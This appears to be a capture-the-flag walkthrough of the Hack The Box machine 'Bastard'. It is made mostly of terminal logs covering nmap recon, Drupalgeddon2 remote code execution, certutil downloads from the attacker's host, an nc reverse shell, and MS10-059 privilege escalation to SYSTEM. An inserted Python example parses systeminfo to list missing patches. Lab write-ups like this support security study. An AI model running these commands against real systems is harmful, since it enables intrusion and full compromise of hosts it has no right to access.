bastard

Introduction:
Recon
eneloop@kinetic:…/hackthebox/bastard/data$ sudo nmap -sS -sC -sV -O -T4 -oN nmap.bastard.txt 10.10.10.9
[sudo] password for eneloop:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-17 23:32 EST
Nmap scan report for 10.10.10.9
Host is up (0.016s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.35 seconds
eneloop@kinetic:…/hackthebox/bastard/data$
Enumeration
(py3) eneloop@kinetic:/oscp/tools/drupwn$ ./drupwn --mode enum --target http://bastard.htb
[-] Version not specified, trying to identify it
[+] Version detected: 7.54
eneloop@kinetic:…/lab/hackthebox/bastard$ searchsploit drupal 7
 Exploit Title                                                                        | Path
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)              | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)           | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution   | php/webapps/44449.rb
eneloop@kinetic:…/lab/hackthebox/bastard$ searchsploit -x php/webapps/44448.py
https://github.com/pimps/CVE-2018-7600
(py3) eneloop@kinetic:.../hackthebox/bastard/data$ ./d7-7600.py -c dir http://10.10.10.9/

=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)                    |
|                                   by pimps                                |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-joAg9mvc4nPpI_TSF2AV3Y2k7p7w_FTPqsfQqwt4pug
[*] Triggering exploit to execute: dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of C:\inetpub\drupal-7.54

19/03/2017  08:04    <DIR>          .
19/03/2017  08:04    <DIR>          ..
19/03/2017  12:42               317 .editorconfig
19/03/2017  12:42               174 .gitignore
19/03/2017  12:42             5.969 .htaccess
19/03/2017  12:42             6.604 authorize.php
19/03/2017  12:42           110.781 CHANGELOG.txt
19/03/2017  12:42             1.481 COPYRIGHT.txt
19/03/2017  12:42               720 cron.php
19/03/2017  12:43    <DIR>          includes
19/03/2017  12:42               529 index.php
19/03/2017  12:42             1.717 INSTALL.mysql.txt
19/03/2017  12:42             1.874 INSTALL.pgsql.txt
Exploitation
(py3) eneloop@kinetic:…/bastard/data/payload$ ./d7-7600.py -c systeminfo http://10.10.10.9/

=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)                    |
|                                   by pimps                                |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-XBJEtt8uMYXWEp6aMr3onLyFKeWkyqDt59K7xmKMBmg
[*] Triggering exploit to execute: systeminfo
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496-001-0001283-84782
Original Install Date: 18/3/2017, 7:04:46
System Boot Time: 18/1/2021, 3:43:34
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.578 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.609 MB
Virtual Memory: In Use: 486 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9
(py3) eneloop@kinetic:…/bastard/data/payload$
(py3) eneloop@kinetic:…/bastard/data/payload$ ./d7-7600.py -c 'certutil.exe -urlcache -f http://10.10.14.38:8000/rc.php C:\inetpub\drupal-7.54\rc.php' http://10.10.10.9/

=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)                    |
|                                   by pimps                                |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-pV3FfyQrok-v1CUk-ICEzzqRbLalxWf99h6r7LLSp8E
[*] Triggering exploit to execute: certutil.exe -urlcache -f http://10.10.14.38:8000/rc.php C:\inetpub\drupal-7.54\rc.php
****  Online  ****
CertUtil: -URLCache command completed successfully.

(py3) eneloop@kinetic:…/bastard/data/payload$ ./d7-7600.py -c 'certutil.exe -urlcache -f http://10.10.14.38:8000/nc64.exe C:\inetpub\drupal-7.54\nc64.exe' http://10.10.10.9/

=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)                    |
|                                   by pimps                                |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-pYpo_IIutDXVaOTa68N6s8T28gEjTkjH9msl5NxSZo0
[*] Triggering exploit to execute: certutil.exe -urlcache -f http://10.10.14.38:8000/nc64.exe C:\inetpub\drupal-7.54\nc64.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

(py3) eneloop@kinetic:…/bastard/data/payload$
Post-exploit/PrivEsc
(py2) eneloop@kinetic:…/windows/winexploitsuggest/Windows-Exploit-Suggester$ python ./windows-exploit-suggester.py -i sysinfo.txt --database=2021-01-01-mssb.xls
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
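windows-exploit-suggester does two things with sysinfo.txt: it pulls the OS version and the installed KBs out of the systeminfo text, then lists the bulletins whose KB is absent. The Python below is an added example that reproduces that comparison for the elevation-of-privilege bulletins printed above (MS10-047, MS10-059, MS10-073, MS11-011, MS13-005, with the KB numbers from the same output); it is not the suggester's code. The first sample is a trimmed copy of the systeminfo output earlier on this page; the second, patched host is constructed for contrast and its build and KB list are assumptions.

```python
import re

# Trimmed copy of the systeminfo output shown earlier on this page.
SYSTEMINFO_SAMPLE = """\
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
"""

# Constructed for contrast: the same OS at SP1 with three of the KBs applied.
PATCHED_SAMPLE = """\
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB982799
                           [02]: KB2393802
                           [03]: KB981852
"""

# Elevation-of-privilege bulletins from the suggester output above, keyed to
# the KB article number it prints in parentheses.
LPE_BULLETINS = {
    "MS10-047": "KB981852",
    "MS10-059": "KB982799",
    "MS10-073": "KB981957",
    "MS11-011": "KB2393802",
    "MS13-005": "KB2778930",
}

FIELD_RE = re.compile(r"^(OS Name|OS Version|System Type):\s*(.+?)\s*$")
KB_RE = re.compile(r"\bKB(\d+)\b")
BUILD_RE = re.compile(r"Build (\d+)")
SP_RE = re.compile(r"Service Pack \d+")


def parse_systeminfo(text):
    """Extract what the patch comparison needs from `systeminfo` output.

    Returns os_name, build (int), service_pack (str or None), arch
    ('x64' or 'x86') and the installed KB numbers in the order listed.
    """
    info = {"os_name": None, "build": None, "service_pack": None,
            "arch": None, "hotfixes": []}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            key, value = m.groups()
            if key == "OS Name":
                info["os_name"] = value
            elif key == "OS Version":
                b = BUILD_RE.search(value)
                info["build"] = int(b.group(1)) if b else None
                sp = SP_RE.search(value)
                info["service_pack"] = sp.group(0) if sp else None
            elif key == "System Type":
                info["arch"] = "x64" if value.startswith("x64") else "x86"
            continue
        # Hotfix entries look like "[01]: KB982799"; "Hotfix(s): N/A" yields none.
        kb = KB_RE.search(line)
        if kb:
            info["hotfixes"].append("KB" + kb.group(1))
    return info


def missing_bulletins(info, bulletins=LPE_BULLETINS):
    """Bulletins whose KB is not in the installed hotfix list.

    Like the suggester, this only checks for the KB itself. A later
    cumulative update that supersedes it is not recognised, so the result
    is a candidate list to verify on the host, not proof of exposure.
    """
    installed = set(info["hotfixes"])
    return sorted(b for b, kb in bulletins.items() if kb not in installed)


if __name__ == "__main__":
    for label, sample in (("bastard", SYSTEMINFO_SAMPLE), ("patched", PATCHED_SAMPLE)):
        info = parse_systeminfo(sample)
        print(label, info["os_name"], info["build"], info["service_pack"],
              info["arch"], "hotfixes:", len(info["hotfixes"]))
        print("  candidate EoP bulletins:", ", ".join(missing_bulletins(info)) or "none")
```

On this host the telling combination is build 7600 (Server 2008 R2 RTM, no SP1) together with "Hotfix(s): N/A": every bulletin in the table comes back as a candidate, which is why the suggester's list above is long and why MS10-059 was a reasonable first pick.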
(py3) eneloop@kinetic:…/bastard/data/payload$ ./d7-7600.py -c 'C:\inetpub\drupal-7.54\nc64.exe -e cmd 10.10.14.38 4455' http://10.10.10.9/

=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)                    |
|                                   by pimps                                |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-1JaW43i4wwmvAouc8TMG5C-VS6knLY1PSlWTgq6GJ24
[*] Triggering exploit to execute: C:\inetpub\drupal-7.54\nc64.exe -e cmd 10.10.14.38 4455

(py3) eneloop@kinetic:…/bastard/data/payload$ ./d7-7600.py -c 'certutil.exe -urlcache -f http://10.10.14.38:8000/MS10-059.exe C:\inetpub\drupal-7.54\MS10-059.exe' http://10.10.10.9/

=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)                    |
|                                   by pimps                                |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-tAHqATaJdeObhIWwMTdAqVjJNc9ajURigKGtKGurlSw
[*] Triggering exploit to execute: certutil.exe -urlcache -f http://10.10.14.38:8000/MS10-059.exe C:\inetpub\drupal-7.54\MS10-059.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

(py3) eneloop@kinetic:…/bastard/data/payload$
$ nc -lvnp 7859
listening on [any] 7859 …

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\iusr

C:\inetpub\drupal-7.54>MS10-059.exe
MS10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell
/Chimichurri/-->Usage: Chimichurri.exe ipaddress port

C:\inetpub\drupal-7.54>MS10-059.exe 10.10.14.38 7859
MS10-059.exe 10.10.14.38 7859
/Chimichurri/-->This exploit gives you a Local System shell
/Chimichurri/-->Changing registry values...
/Chimichurri/-->Got SYSTEM token...
/Chimichurri/-->Running reverse shell...
/Chimichurri/-->Restoring default registry values...

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system

C:\inetpub\drupal-7.54>cd ../..
cd ../..

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of C:\

07/11/2007  08:00            17.734 eula.1028.txt
07/11/2007  08:00            17.734 eula.1031.txt
07/11/2007  08:00            10.134 eula.1033.txt
07/11/2007  08:00            17.734 eula.1036.txt
07/11/2007  08:00            17.734 eula.1040.txt
07/11/2007  08:00               118 eula.1041.txt
07/11/2007  08:00            17.734 eula.1042.txt
07/11/2007  08:00            17.734 eula.2052.txt
07/11/2007  08:00            17.734 eula.3082.txt
07/11/2007  08:00             1.110 globdata.ini
19/03/2017  12:43

C:\>cd Users
cd Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of C:\Users

19/03/2017  07:35

C:\Users>cd dmitris
cd dmitris
The system cannot find the path specified.

C:\Users>cd dimitris
cd dimitris

C:\Users\dimitris>cd Desktop
cd Desktop

C:\Users\dimitris\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of C:\Users\dimitris\Desktop

19/03/2017  08:04

C:\Users\dimitris\Desktop>cat user.txt
cat user.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\dimitris\Desktop>type user.txt
type user.txt
baXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXa2

C:\Users\dimitris\Desktop>cd ../..
cd ../..

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of C:\Users

19/03/2017  07:35

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of C:\Users\Administrator

19/03/2017  01:20

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of C:\Users\Administrator\Desktop

19/03/2017  07:33

C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
4bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX7c

C:\Users\Administrator\Desktop>
Notes: